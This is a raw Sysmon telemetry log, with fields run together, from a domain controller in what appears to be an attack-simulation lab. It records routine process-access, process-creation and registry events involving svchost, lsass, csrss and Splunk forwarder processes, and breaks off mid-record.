10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42E1-6000-9800-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.271{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42E1-6000-9800-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:57.272{08A6967A-42E1-6000-9800-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42E3-6000-9900-000000009A01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42E3-6000-9900-000000009A01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.042{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42E3-6000-9900-000000009A01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:59.043{08A6967A-42E3-6000-9900-000000009A01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:20.437{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-2000-000000009A01}2424C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:20.437{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-2000-000000009A01}2424C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:11:36.510{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea76-0xc9b49bed) 10341000x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:36.056{08A6967A-428D-6000-2400-000000009A01}30163032C:\Windows\servicing\TrustedInstaller.exe{08A6967A-428D-6000-2500-000000009A01}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 